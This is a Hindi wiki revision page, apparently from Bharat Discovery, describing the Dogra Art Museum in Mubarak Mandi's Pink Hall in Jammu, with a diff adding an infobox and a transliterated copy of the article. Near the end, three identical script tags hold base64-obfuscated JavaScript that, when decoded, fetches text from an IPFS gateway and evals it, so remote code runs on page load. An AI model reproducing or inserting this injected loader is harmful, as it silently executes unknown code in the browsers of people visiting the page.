Difference between revisions of "डोगरा कला संग्रहालय जम्मू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:जम्मू और कश्मीर (को हटा दिया गया हैं।))
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*डोगरा कला संग्रहालय [[जम्मू और कश्मीर]] राज्य के [[जम्मू]] शहर में स्थित है।  
+
{{सूचना बक्सा संग्रहालय
*डोगरा कला संग्रहालय मुबारक मंडी परिसर के पिंक हॉल में स्थित है।  
+
|चित्र=Dogra-Art-Museum.jpg
*डोगरा कला संग्रहालय में विभिन्न शैलियों की खूबसूरत चित्रकारी (पेंटिंग) मौजूद है।  
+
|चित्र का नाम=डोगरा कला संग्रहालय, जम्मू
*[[मुग़ल]] शासक [[शाहजहाँ]] के समय का, सोने की परत चढ़ा धनुष व तीर और बड़ी संख्या में बढ़ई के औजार संग्रहालय का सबसे महत्वपूर्ण हिस्सा है।  
+
|विवरण=डोगरा कला संग्रहालय [[जम्मू]] शहर में मुबारक मंडी परिसर के पिंक हॉल में स्थित है।
 +
|राज्य= [[जम्मू और कश्मीर]]
 +
|नगर=[[जम्मू]]
 +
|निर्माण=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=जम्मू हवाई अड्डे से लगभग 8 किमी की दूरी पर है।
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Jammu+Airport,+Jammu&daddr=Dogra+Art+Museum&hl=en&ll=32.713789,74.85878&spn=0.08536,0.181789&sll=32.704111,74.859467&sspn=0.085369,0.181789&geocode=FWbQ8gEdafN1BCFIA321x2G-Aw%3BFdKN8wEdOoB2BCFv7rxBZfWxmA&oq=jammu+ai&mra=ls&t=m&z=13 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[मुग़ल]] शासक [[शाहजहाँ]] के समय का, [[सोना|सोने]] की परत चढ़ा [[धनुष]] व तीर और बड़ी संख्या में बढ़ई के औजार संग्रहालय का सबसे महत्त्वपूर्ण हिस्सा है।  
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:44, 8 मई 2012 (IST)}}
 +
}}
 +
'''डोगरा कला संग्रहालय''' [[जम्मू और कश्मीर]] राज्य के [[जम्मू]] शहर में मुबारक मंडी परिसर के पिंक हॉल में स्थित है।  
 +
*डोगरा कला संग्रहालय में विभिन्न शैलियों की ख़ूबसूरत चित्रकारी (पेंटिंग) मौजूद है।  
 +
*[[मुग़ल]] शासक [[शाहजहाँ]] के समय का, [[सोना|सोने]] की परत चढ़ा [[धनुष]] व तीर और बड़ी संख्या में बढ़ई के औजार संग्रहालय का सबसे महत्त्वपूर्ण हिस्सा है।  
 
*इसके अलावा संग्रहालय में शाहजहाँ और [[सिकंदर]] द्वारा [[फ़ारसी भाषा|फ़ारसी]] में लिखी मनुलिपि आज भी मौजूद है।
 
*इसके अलावा संग्रहालय में शाहजहाँ और [[सिकंदर]] द्वारा [[फ़ारसी भाषा|फ़ारसी]] में लिखी मनुलिपि आज भी मौजूद है।
  
Line 12: Line 32:
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
 +
{{जम्मू और कश्मीर के पर्यटन स्थल}}
 +
{{संग्रहालय}}
 
[[Category:पर्यटन_कोश]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:जम्मू]]
 
[[Category:जम्मू]]
 
[[Category:जम्मू और कश्मीर के पर्यटन स्थल]]
 
[[Category:जम्मू और कश्मीर के पर्यटन स्थल]]
 +
[[Category:संग्रहालय]]
 +
[[Category:संग्रहालय कोश]]
 +
[[Category:जम्मू और कश्मीर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:56, 14 July 2012

dogara kala sangrahalay jammoo
vivaran dogara kala sangrahalay jammoo shahar mean mubarak mandi parisar ke piank h aaul mean sthit hai.
rajy jammoo aur kashmir
nagar jammoo
marg sthiti jammoo havaee adde se lagabhag 8 kimi ki doori par hai.
chitr:Map-icon.gif googal manachitr
any janakari mugal shasak shahajahaan ke samay ka, sone ki parat chadha dhanush v tir aur b di sankhya mean badhee ke aujar sangrahalay ka sabase mahattvapoorn hissa hai.
adyatan‎

dogara kala sangrahalay jammoo aur kashmir rajy ke jammoo shahar mean mubarak mandi parisar ke piank h aaul mean sthit hai.

  • dogara kala sangrahalay mean vibhinn shailiyoan ki khoobasoorat chitrakari (peantiang) maujood hai.
  • mugal shasak shahajahaan ke samay ka, sone ki parat chadha dhanush v tir aur b di sankhya mean badhee ke aujar sangrahalay ka sabase mahattvapoorn hissa hai.
  • isake alava sangrahalay mean shahajahaan aur sikandar dvara farasi mean likhi manulipi aj bhi maujood hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>